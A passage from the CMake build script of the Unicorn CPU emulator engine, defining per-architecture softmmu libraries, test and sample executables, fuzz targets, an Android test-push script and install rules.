qemu/target/arm/psci.c qemu/target/arm/sve_helper.c qemu/target/arm/tlb_helper.c qemu/target/arm/translate-a64.c qemu/target/arm/translate.c qemu/target/arm/translate-sve.c qemu/target/arm/vec_helper.c qemu/target/arm/vfp_helper.c qemu/target/arm/unicorn_aarch64.c ) if(MSVC) target_compile_options(aarch64-softmmu PRIVATE -DNEED_CPU_H /FIaarch64.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/aarch64-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/arm ) else() target_compile_options(aarch64-softmmu PRIVATE -DNEED_CPU_H 
-include aarch64.h -I${CMAKE_BINARY_DIR}/aarch64-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/arm ) endif() if(UNICORN_TRACER) target_compile_options(aarch64-softmmu PRIVATE -DUNICORN_TRACER) endif() endif() if(UNICORN_HAS_M68K) add_library(m68k-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/m68k/cpu.c qemu/target/m68k/fpu_helper.c qemu/target/m68k/helper.c qemu/target/m68k/op_helper.c qemu/target/m68k/softfloat.c qemu/target/m68k/translate.c qemu/target/m68k/unicorn.c ) if(MSVC) target_compile_options(m68k-softmmu PRIVATE -DNEED_CPU_H /FIm68k.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/m68k-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/m68k ) else() target_compile_options(m68k-softmmu PRIVATE -DNEED_CPU_H -include m68k.h -I${CMAKE_BINARY_DIR}/m68k-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/m68k ) endif() if(UNICORN_TRACER) target_compile_options(m68k-softmmu PRIVATE -DUNICORN_TRACER) endif() endif() if(UNICORN_HAS_MIPS) add_library(mips-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/mips/cp0_helper.c qemu/target/mips/cp0_timer.c qemu/target/mips/cpu.c qemu/target/mips/dsp_helper.c qemu/target/mips/fpu_helper.c qemu/target/mips/helper.c qemu/target/mips/lmi_helper.c qemu/target/mips/msa_helper.c qemu/target/mips/op_helper.c qemu/target/mips/translate.c qemu/target/mips/unicorn.c ) if(MSVC) target_compile_options(mips-softmmu PRIVATE -DNEED_CPU_H /FImips.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/mips-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/mips ) else() target_compile_options(mips-softmmu PRIVATE -DNEED_CPU_H -include mips.h -I${CMAKE_BINARY_DIR}/mips-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/mips ) endif() if(UNICORN_TRACER) target_compile_options(mips-softmmu PRIVATE -DUNICORN_TRACER) endif() add_library(mipsel-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/mips/cp0_helper.c qemu/target/mips/cp0_timer.c qemu/target/mips/cpu.c qemu/target/mips/dsp_helper.c qemu/target/mips/fpu_helper.c qemu/target/mips/helper.c qemu/target/mips/lmi_helper.c qemu/target/mips/msa_helper.c qemu/target/mips/op_helper.c qemu/target/mips/translate.c qemu/target/mips/unicorn.c ) if(MSVC) target_compile_options(mipsel-softmmu PRIVATE -DNEED_CPU_H /FImipsel.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/mipsel-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/mips ) else() target_compile_options(mipsel-softmmu PRIVATE -DNEED_CPU_H -include mipsel.h -I${CMAKE_BINARY_DIR}/mipsel-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/mips ) endif() if(UNICORN_TRACER) target_compile_options(mipsel-softmmu PRIVATE -DUNICORN_TRACER) endif() add_library(mips64-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/mips/cp0_helper.c qemu/target/mips/cp0_timer.c qemu/target/mips/cpu.c qemu/target/mips/dsp_helper.c qemu/target/mips/fpu_helper.c qemu/target/mips/helper.c qemu/target/mips/lmi_helper.c qemu/target/mips/msa_helper.c qemu/target/mips/op_helper.c qemu/target/mips/translate.c qemu/target/mips/unicorn.c ) if(MSVC) target_compile_options(mips64-softmmu PRIVATE -DNEED_CPU_H /FImips64.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/mips64-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/mips ) else() target_compile_options(mips64-softmmu PRIVATE -DNEED_CPU_H -include mips64.h -I${CMAKE_BINARY_DIR}/mips64-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/mips ) endif() if(UNICORN_TRACER) target_compile_options(mips64-softmmu PRIVATE -DUNICORN_TRACER) endif() add_library(mips64el-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/mips/cp0_helper.c qemu/target/mips/cp0_timer.c qemu/target/mips/cpu.c 
qemu/target/mips/dsp_helper.c qemu/target/mips/fpu_helper.c qemu/target/mips/helper.c qemu/target/mips/lmi_helper.c qemu/target/mips/msa_helper.c qemu/target/mips/op_helper.c qemu/target/mips/translate.c qemu/target/mips/unicorn.c ) if(MSVC) target_compile_options(mips64el-softmmu PRIVATE -DNEED_CPU_H /FImips64el.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/mips64el-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/mips ) else() target_compile_options(mips64el-softmmu PRIVATE -DNEED_CPU_H -include mips64el.h -I${CMAKE_BINARY_DIR}/mips64el-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/mips ) endif() if(UNICORN_TRACER) target_compile_options(mips64el-softmmu PRIVATE -DUNICORN_TRACER) endif() endif() if(UNICORN_HAS_SPARC) add_library(sparc-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/sparc/cc_helper.c qemu/target/sparc/cpu.c qemu/target/sparc/fop_helper.c qemu/target/sparc/helper.c qemu/target/sparc/int32_helper.c qemu/target/sparc/ldst_helper.c qemu/target/sparc/mmu_helper.c qemu/target/sparc/translate.c qemu/target/sparc/win_helper.c qemu/target/sparc/unicorn.c ) if(MSVC) target_compile_options(sparc-softmmu PRIVATE -DNEED_CPU_H /FIsparc.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/sparc-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/sparc ) else() target_compile_options(sparc-softmmu PRIVATE -DNEED_CPU_H -include sparc.h -I${CMAKE_BINARY_DIR}/sparc-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/sparc ) endif() if(UNICORN_TRACER) target_compile_options(sparc-softmmu PRIVATE -DUNICORN_TRACER) endif() add_library(sparc64-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/sparc/cc_helper.c qemu/target/sparc/cpu.c qemu/target/sparc/fop_helper.c qemu/target/sparc/helper.c qemu/target/sparc/int64_helper.c qemu/target/sparc/ldst_helper.c qemu/target/sparc/mmu_helper.c qemu/target/sparc/translate.c qemu/target/sparc/vis_helper.c qemu/target/sparc/win_helper.c qemu/target/sparc/unicorn64.c ) if(MSVC) target_compile_options(sparc64-softmmu PRIVATE -DNEED_CPU_H /FIsparc64.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/sparc64-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/sparc ) else() target_compile_options(sparc64-softmmu PRIVATE -DNEED_CPU_H -include sparc64.h -I${CMAKE_BINARY_DIR}/sparc64-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/sparc ) endif() if(UNICORN_TRACER) target_compile_options(sparc64-softmmu PRIVATE -DUNICORN_TRACER) endif() endif() if(UNICORN_HAS_PPC) add_library(ppc-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/hw/ppc/ppc.c qemu/hw/ppc/ppc_booke.c qemu/libdecnumber/decContext.c qemu/libdecnumber/decNumber.c qemu/libdecnumber/dpd/decimal128.c qemu/libdecnumber/dpd/decimal32.c qemu/libdecnumber/dpd/decimal64.c qemu/target/ppc/cpu.c qemu/target/ppc/cpu-models.c qemu/target/ppc/dfp_helper.c qemu/target/ppc/excp_helper.c qemu/target/ppc/fpu_helper.c qemu/target/ppc/int_helper.c qemu/target/ppc/machine.c qemu/target/ppc/mem_helper.c qemu/target/ppc/misc_helper.c qemu/target/ppc/mmu-hash32.c qemu/target/ppc/mmu_helper.c qemu/target/ppc/timebase_helper.c qemu/target/ppc/translate.c qemu/target/ppc/unicorn.c ) if(MSVC) target_compile_options(ppc-softmmu PRIVATE -DNEED_CPU_H /FIppc.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/ppc-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/ppc ) else() target_compile_options(ppc-softmmu PRIVATE -DNEED_CPU_H -include ppc.h -I${CMAKE_BINARY_DIR}/ppc-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/ppc ) endif() if(UNICORN_TRACER) target_compile_options(ppc-softmmu PRIVATE -DUNICORN_TRACER) endif() add_library(ppc64-softmmu STATIC ${UNICORN_ARCH_COMMON} 
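# ppc64 extends the ppc source list with compat.c and the 64-bit MMU
# models (mmu-hash64, mmu-radix64, mmu-book3s-v3).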
qemu/hw/ppc/ppc.c qemu/hw/ppc/ppc_booke.c qemu/libdecnumber/decContext.c qemu/libdecnumber/decNumber.c qemu/libdecnumber/dpd/decimal128.c qemu/libdecnumber/dpd/decimal32.c qemu/libdecnumber/dpd/decimal64.c qemu/target/ppc/compat.c qemu/target/ppc/cpu.c qemu/target/ppc/cpu-models.c qemu/target/ppc/dfp_helper.c qemu/target/ppc/excp_helper.c qemu/target/ppc/fpu_helper.c qemu/target/ppc/int_helper.c qemu/target/ppc/machine.c qemu/target/ppc/mem_helper.c qemu/target/ppc/misc_helper.c qemu/target/ppc/mmu-book3s-v3.c qemu/target/ppc/mmu-hash32.c qemu/target/ppc/mmu-hash64.c qemu/target/ppc/mmu_helper.c qemu/target/ppc/mmu-radix64.c qemu/target/ppc/timebase_helper.c qemu/target/ppc/translate.c qemu/target/ppc/unicorn.c ) if(MSVC) target_compile_options(ppc64-softmmu PRIVATE -DNEED_CPU_H /FIppc64.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/ppc64-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/ppc ) else() target_compile_options(ppc64-softmmu PRIVATE -DNEED_CPU_H -include ppc64.h -I${CMAKE_BINARY_DIR}/ppc64-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/ppc ) endif() if(UNICORN_TRACER) target_compile_options(ppc64-softmmu PRIVATE -DUNICORN_TRACER) endif() endif() if(UNICORN_HAS_RISCV) add_library(riscv32-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/riscv/cpu.c qemu/target/riscv/cpu_helper.c qemu/target/riscv/csr.c qemu/target/riscv/fpu_helper.c qemu/target/riscv/op_helper.c qemu/target/riscv/pmp.c qemu/target/riscv/translate.c qemu/target/riscv/unicorn.c ) if(MSVC) target_compile_options(riscv32-softmmu PRIVATE -DNEED_CPU_H /FIriscv32.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/riscv32-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/riscv ) else() target_compile_options(riscv32-softmmu PRIVATE -DNEED_CPU_H -include riscv32.h -I${CMAKE_BINARY_DIR}/riscv32-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/riscv ) endif() if(UNICORN_TRACER) target_compile_options(riscv32-softmmu PRIVATE -DUNICORN_TRACER) endif() add_library(riscv64-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/riscv/cpu.c qemu/target/riscv/cpu_helper.c qemu/target/riscv/csr.c qemu/target/riscv/fpu_helper.c qemu/target/riscv/op_helper.c qemu/target/riscv/pmp.c qemu/target/riscv/translate.c qemu/target/riscv/unicorn.c ) if(MSVC) target_compile_options(riscv64-softmmu PRIVATE -DNEED_CPU_H /FIriscv64.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/riscv64-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/riscv ) else() target_compile_options(riscv64-softmmu PRIVATE -DNEED_CPU_H -include riscv64.h -I${CMAKE_BINARY_DIR}/riscv64-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/riscv ) endif() if(UNICORN_TRACER) target_compile_options(riscv64-softmmu PRIVATE -DUNICORN_TRACER) endif() endif() if (UNICORN_HAS_S390X) add_library(s390x-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/hw/s390x/s390-skeys.c qemu/target/s390x/cc_helper.c qemu/target/s390x/cpu.c qemu/target/s390x/cpu_features.c qemu/target/s390x/cpu_models.c qemu/target/s390x/crypto_helper.c qemu/target/s390x/excp_helper.c qemu/target/s390x/fpu_helper.c qemu/target/s390x/helper.c qemu/target/s390x/interrupt.c qemu/target/s390x/int_helper.c qemu/target/s390x/ioinst.c qemu/target/s390x/mem_helper.c qemu/target/s390x/misc_helper.c qemu/target/s390x/mmu_helper.c qemu/target/s390x/sigp.c qemu/target/s390x/tcg-stub.c qemu/target/s390x/translate.c qemu/target/s390x/vec_fpu_helper.c qemu/target/s390x/vec_helper.c qemu/target/s390x/vec_int_helper.c qemu/target/s390x/vec_string_helper.c qemu/target/s390x/unicorn.c ) if(MSVC) target_compile_options(s390x-softmmu PRIVATE -DNEED_CPU_H /FIs390x.h 
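# MSVC builds use the pre-generated config headers shipped under
# msvc/<target>-softmmu; other toolchains pick them up from
# ${CMAKE_BINARY_DIR}/<target>-softmmu, where they are generated at
# configure time.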
/I${CMAKE_CURRENT_SOURCE_DIR}/msvc/s390x-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/s390x ) else() target_compile_options(s390x-softmmu PRIVATE -DNEED_CPU_H -include s390x.h -I${CMAKE_BINARY_DIR}/s390x-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/s390x ) endif() endif() if (UNICORN_HAS_TRICORE) add_library(tricore-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/tricore/cpu.c qemu/target/tricore/fpu_helper.c qemu/target/tricore/helper.c qemu/target/tricore/op_helper.c qemu/target/tricore/translate.c qemu/target/tricore/unicorn.c ) if(MSVC) target_compile_options(tricore-softmmu PRIVATE -DNEED_CPU_H /FItricore.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/tricore-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/tricore ) else() target_compile_options(tricore-softmmu PRIVATE -DNEED_CPU_H -include tricore.h -I${CMAKE_BINARY_DIR}/tricore-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/tricore ) endif() endif() set(UNICORN_SRCS uc.c qemu/softmmu/vl.c qemu/hw/core/cpu.c ) set(UNICORN_COMMON_SRCS list.c glib_compat/glib_compat.c glib_compat/gtestutils.c glib_compat/garray.c glib_compat/gtree.c glib_compat/grand.c glib_compat/glist.c glib_compat/gmem.c glib_compat/gpattern.c glib_compat/gslice.c qemu/util/bitmap.c qemu/util/bitops.c qemu/util/crc32c.c qemu/util/cutils.c qemu/util/getauxval.c qemu/util/guest-random.c qemu/util/host-utils.c qemu/util/osdep.c qemu/util/qdist.c qemu/util/qemu-timer.c qemu/util/qemu-timer-common.c qemu/util/range.c qemu/util/qht.c qemu/util/pagesize.c qemu/util/cacheinfo.c qemu/crypto/aes.c ) # A workaround to avoid circle dependency between unicorn and *-softmmu if(MSVC) set(UNICORN_COMMON_SRCS ${UNICORN_COMMON_SRCS} qemu/util/oslib-win32.c qemu/util/qemu-thread-win32.c ) if(CMAKE_SIZEOF_VOID_P EQUAL 8) if(MSVC_VERSION LESS 1600 AND MSVC_IDE) add_custom_command(OUTPUT "${CMAKE_CURRENT_SOURCE_DIR}/build/setjmp-wrapper-win32.dir/setjmp-wrapper-win32.obj" COMMAND ml64 /c /nologo /Fo"${CMAKE_CURRENT_SOURCE_DIR}/build/setjmp-wrapper-win32.dir/setjmp-wrapper-win32.obj" /W3 /errorReport:prompt /Ta"${CMAKE_CURRENT_SOURCE_DIR}/qemu/util/setjmp-wrapper-win32.asm" DEPENDS "${CMAKE_CURRENT_SOURCE_DIR}/qemu/util/setjmp-wrapper-win32.asm" ) set(UNICORN_SRCS ${UNICORN_SRCS} "${CMAKE_CURRENT_SOURCE_DIR}/build/setjmp-wrapper-win32.dir/setjmp-wrapper-win32.obj") else() enable_language(ASM_MASM) endif() set(UNICORN_COMMON_SRCS ${UNICORN_COMMON_SRCS} qemu/util/setjmp-wrapper-win32.asm) set_property(SOURCE qemu/util/setjmp-wrapper-win32.asm PROPERTY LANGUAGE ASM_MASM) endif() else() set(UNICORN_COMMON_SRCS ${UNICORN_COMMON_SRCS} qemu/util/oslib-posix.c qemu/util/qemu-thread-posix.c ) endif() add_library(unicorn-common STATIC ${UNICORN_COMMON_SRCS} ) set_target_properties(unicorn-common PROPERTIES C_VISIBILITY_PRESET hidden) if(NOT MSVC AND NOT ANDROID_ABI) target_link_libraries(unicorn-common PRIVATE pthread) endif() add_library(unicorn ${UNICORN_SRCS}) # For static archive if (BUILD_SHARED_LIBS) add_library(unicorn_static STATIC ${UNICORN_SRCS}) endif() if(BUILD_SHARED_LIBS) if(ANDROID_ABI) file(APPEND ${CMAKE_BINARY_DIR}/adb.sh "adb push ./libunicorn.so /data/local/tmp/build/\n") endif() endif() set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} unicorn-common) if (ATOMIC_LINKAGE_FIX) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -latomic) endif() if(UNICORN_HAS_X86) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_X86) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} x86_64-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_x86 
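# Besides the basic sample_x86, the x86 build registers extra samples
# covering GDT/segment registers, batched register access, the memory
# APIs, shellcode emulation and the MMU.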
sample_x86_32_gdt_and_seg_regs sample_batch_reg mem_apis shellcode sample_mmu) target_link_libraries(x86_64-softmmu PRIVATE unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_x86) endif() if(UNICORN_HAS_ARM) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_ARM) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} arm-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_arm) target_link_libraries(arm-softmmu PRIVATE unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_arm) endif() if(UNICORN_HAS_AARCH64) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_ARM64) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} aarch64-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_arm64) target_link_libraries(aarch64-softmmu PRIVATE unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_arm64) endif() if(UNICORN_HAS_M68K) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_M68K) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} m68k-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_m68k) target_link_libraries(m68k-softmmu PRIVATE unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_m68k) endif() if(UNICORN_HAS_MIPS) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_MIPS -DUNICORN_HAS_MIPSEL -DUNICORN_HAS_MIPS64 -DUNICORN_HAS_MIPS64EL) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} mips-softmmu mipsel-softmmu mips64-softmmu mips64el-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_mips) target_link_libraries(mips-softmmu PRIVATE unicorn-common) target_link_libraries(mipsel-softmmu PRIVATE unicorn-common) target_link_libraries(mips64-softmmu PRIVATE unicorn-common) target_link_libraries(mips64el-softmmu PRIVATE unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_mips) endif() if(UNICORN_HAS_SPARC) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_SPARC) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} sparc-softmmu sparc64-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_sparc) target_link_libraries(sparc-softmmu PRIVATE unicorn-common) target_link_libraries(sparc64-softmmu PRIVATE unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_sparc) endif() if(UNICORN_HAS_PPC) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_PPC) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} ppc-softmmu ppc64-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_ppc) target_link_libraries(ppc-softmmu PRIVATE unicorn-common) target_link_libraries(ppc64-softmmu PRIVATE unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_ppc) endif() if(UNICORN_HAS_RISCV) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_RISCV) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} riscv32-softmmu riscv64-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_riscv) target_link_libraries(riscv32-softmmu PRIVATE unicorn-common) target_link_libraries(riscv64-softmmu PRIVATE unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_riscv) endif() if (UNICORN_HAS_S390X) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_S390X) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} s390x-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_s390x) target_link_libraries(s390x-softmmu PRIVATE unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_s390x) endif() if (UNICORN_HAS_TRICORE) 
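# Every UNICORN_HAS_<ARCH> block follows the same pattern: define the
# matching UNICORN_HAS_* macro, append the softmmu library to the link
# set, link it against unicorn-common, and register its sample and
# unit-test executables.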
set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_TRICORE) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} tricore-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_tricore) target_link_libraries(tricore-softmmu unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_tricore) endif() # Extra tests set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_mem) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_ctl) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_ctl) if(UNICORN_TRACER) target_compile_options(unicorn-common PRIVATE -DUNICORN_TRACER) target_compile_options(unicorn PRIVATE -DUNICORN_TRACER) endif() target_compile_options(unicorn-common PRIVATE ${UNICORN_COMPILE_OPTIONS} ) target_compile_options(unicorn PRIVATE ${UNICORN_COMPILE_OPTIONS} ) # For static archive if (BUILD_SHARED_LIBS) target_compile_options(unicorn_static PRIVATE ${UNICORN_COMPILE_OPTIONS} ) endif() if(MINGW) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} pthread) endif() if(ATOMIC_LINKAGE_FIX) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} atomic) endif() if(MSVC) if(BUILD_SHARED_LIBS) target_compile_options(unicorn PRIVATE -DUNICORN_SHARED ) # For static archive target_link_libraries(unicorn_static PRIVATE ${UNICORN_LINK_LIBRARIES} ) endif() target_link_libraries(unicorn PRIVATE ${UNICORN_LINK_LIBRARIES} ) set_target_properties(unicorn PROPERTIES VERSION "${UNICORN_VERSION_MAJOR}.${UNICORN_VERSION_MINOR}" ) else() target_link_libraries(unicorn PRIVATE ${UNICORN_LINK_LIBRARIES} m ) target_link_libraries(unicorn PUBLIC m ) # For static archive if (BUILD_SHARED_LIBS) target_link_libraries(unicorn_static PUBLIC m ) target_link_libraries(unicorn_static PRIVATE ${UNICORN_LINK_LIBRARIES} m ) endif() set_target_properties(unicorn PROPERTIES VERSION ${UNICORN_VERSION_MAJOR} SOVERSION ${UNICORN_VERSION_MAJOR} ) endif() if(MSVC) set(SAMPLES_LIB unicorn ) elseif(NOT ANDROID_ABI) set(SAMPLES_LIB unicorn pthread ) else() set(SAMPLES_LIB unicorn ) endif() if(ATOMIC_LINKAGE_FIX) set(SAMPLES_LIB ${SAMPLES_LIB} atomic ) endif() target_include_directories(unicorn PUBLIC include ) # For static archive if (BUILD_SHARED_LIBS) target_include_directories(unicorn_static PUBLIC include ) endif() # Black magic for generating static archives... if (BUILD_SHARED_LIBS) if (MSVC) # Avoid the import lib built by MVSC clash with our archive. set_target_properties(unicorn PROPERTIES ARCHIVE_OUTPUT_NAME "unicorn-import") endif() bundle_static_library(unicorn_static unicorn_archive unicorn) else() # Rename the "static" lib to avoid filename clash. 
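# In static-only builds the real target is emitted as libunicorn-static,
# freeing the plain libunicorn name for the bundled archive produced by
# bundle_static_library() below.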
set_target_properties(unicorn PROPERTIES OUTPUT_NAME "unicorn-static") bundle_static_library(unicorn unicorn_archive unicorn) endif() if(UNICORN_FUZZ) set(UNICORN_FUZZ_SUFFIX "arm_arm;arm_armbe;arm_thumb;arm64_arm;arm64_armbe;m68k_be;mips_32be;mips_32le;sparc_32be;x86_16;x86_32;x86_64;s390x_be") if (NOT APPLE) set(SAMPLES_LIB ${SAMPLES_LIB} rt) endif() foreach(SUFFIX ${UNICORN_FUZZ_SUFFIX}) add_executable(fuzz_emu_${SUFFIX} ${CMAKE_CURRENT_SOURCE_DIR}/tests/fuzz/fuzz_emu_${SUFFIX}.c ${CMAKE_CURRENT_SOURCE_DIR}/tests/fuzz/onedir.c ) target_link_libraries(fuzz_emu_${SUFFIX} PRIVATE ${SAMPLES_LIB} ) endforeach() endif() if(UNICORN_BUILD_TESTS) enable_testing() foreach(SAMPLE_FILE ${UNICORN_SAMPLE_FILE}) add_executable(${SAMPLE_FILE} ${CMAKE_CURRENT_SOURCE_DIR}/samples/${SAMPLE_FILE}.c ) target_link_libraries(${SAMPLE_FILE} PRIVATE ${SAMPLES_LIB} ) endforeach() foreach(TEST_FILE ${UNICORN_TEST_FILE}) add_executable(${TEST_FILE} ${CMAKE_CURRENT_SOURCE_DIR}/tests/unit/${TEST_FILE}.c ) target_compile_options(${TEST_FILE} PRIVATE ${UNICORN_COMPILE_OPTIONS} ) target_link_libraries(${TEST_FILE} PRIVATE ${SAMPLES_LIB} ) add_test(${TEST_FILE} ${TEST_FILE}) if(ANDROID_ABI) file(APPEND ${CMAKE_BINARY_DIR}/adb.sh "adb push ${TEST_FILE} /data/local/tmp/build/\n") file(APPEND ${CMAKE_BINARY_DIR}/adb.sh "adb shell \"chmod +x /data/local/tmp/build/${TEST_FILE}\"\n") file(APPEND ${CMAKE_BINARY_DIR}/adb.sh "adb shell \'LD_LIBRARY_PATH=/data/local/tmp/build:$LD_LIBRARY_PATH /data/local/tmp/build/${TEST_FILE}\' || exit -1\n") endif() if (UNICORN_TARGET_ARCH STREQUAL "aarch64" OR UNICORN_TARGET_ARCH STREQUAL "ppc") target_compile_definitions(${TEST_FILE} PRIVATE TARGET_READ_INLINED) endif() endforeach() endif() if(UNICORN_INSTALL AND NOT MSVC) include("GNUInstallDirs") file(GLOB UNICORN_HEADERS ${CMAKE_CURRENT_SOURCE_DIR}/include/unicorn/*.h) if (BUILD_SHARED_LIBS) install(TARGETS unicorn RUNTIME DESTINATION ${CMAKE_INSTALL_BINDIR} ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR} LIBRARY DESTINATION ${CMAKE_INSTALL_LIBDIR} ) endif() install(FILES $<TARGET_FILE:unicorn_archive> DESTINATION ${CMAKE_INSTALL_LIBDIR}) install(FILES ${UNICORN_HEADERS} DESTINATION ${CMAKE_INSTALL_INCLUDEDIR}/unicorn) if (ATOMIC_LINKAGE_FIX) set(ATOMIC_LINK_PKG_CONFIG " -latomic") else() set(ATOMIC_LINK_PKG_CONFIG "") endif() file(WRITE ${CMAKE_BINARY_DIR}/unicorn.pc "Name: unicorn\n\ Description: Unicorn emulator engine\n\ Version: ${UNICORN_VERSION_MAJOR}.${UNICORN_VERSION_MINOR}.${UNICORN_VERSION_PATCH}\n\ libdir=${CMAKE_INSTALL_FULL_LIBDIR}\n\ includedir=${CMAKE_INSTALL_FULL_INCLUDEDIR}\n\ Libs: -L\$\{libdir\} -lunicorn\n\ Libs.private: -lpthread -lm${ATOMIC_LINK_PKG_CONFIG}\n\ Cflags: -I\$\{includedir\}\n" ) install(FILES ${CMAKE_BINARY_DIR}/unicorn.pc DESTINATION ${CMAKE_INSTALL_LIBDIR}/pkgconfig) endif() unicorn-2.1.1/COPYING000066400000000000000000000431101467524106700142360ustar00rootroot00000000000000 GNU GENERAL PUBLIC LICENSE 